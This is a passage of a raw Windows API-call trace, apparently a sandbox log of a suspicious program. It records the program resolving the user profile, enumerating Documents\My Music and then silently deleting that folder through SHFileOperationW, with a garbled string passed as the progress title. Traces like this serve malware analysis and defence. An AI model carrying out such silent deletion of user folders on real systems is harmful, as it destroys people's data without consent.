[0264.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0264.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0264.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0264.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0264.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0264.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0264.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0264.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0264.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0264.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x62) returned 0x24202f0 [0264.493] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/My Music", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpFilePart=0x8bedfc*="My Music") returned 0x30 [0264.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0264.493] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my music")) returned 0x2416 [0264.494] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x25c0000, ftCreationTime.dwLowDateTime=0x4a82e4, ftCreationTime.dwHighDateTime=0x1580012, ftLastAccessTime.dwLowDateTime=0x1d17, ftLastAccessTime.dwHighDateTime=0x13a0021, ftLastWriteTime.dwLowDateTime=0x1fdfd, ftLastWriteTime.dwHighDateTime=0x4a8178, nFileSizeHigh=0x74f605ba, nFileSizeLow=0x25c6d68, dwReserved0=0x1d17, dwReserved1=0x4, cFileName="", cAlternateFileName="")) returned 0xffffffff [0264.494] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0264.494] GetLastError () returned 0x6 [0264.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0264.494] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0264.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0264.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0264.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0264.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0264.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0264.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0264.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0264.495] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0264.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0264.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0264.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0264.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0264.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0264.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9de0 [0264.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0264.495] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0264.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0264.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0264.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0264.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0264.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0264.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0264.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0264.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0264.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0264.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0264.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0264.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0264.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0264.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0264.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0264.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0264.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0264.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0264.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0264.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0264.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0264.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0264.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0264.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0264.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0264.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x62) returned 0x24202f0 [0264.497] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/My Music", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", lpFilePart=0x8bf658*="My Music") returned 0x30 [0264.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0264.497] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my music")) returned 0x2416 [0264.497] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d7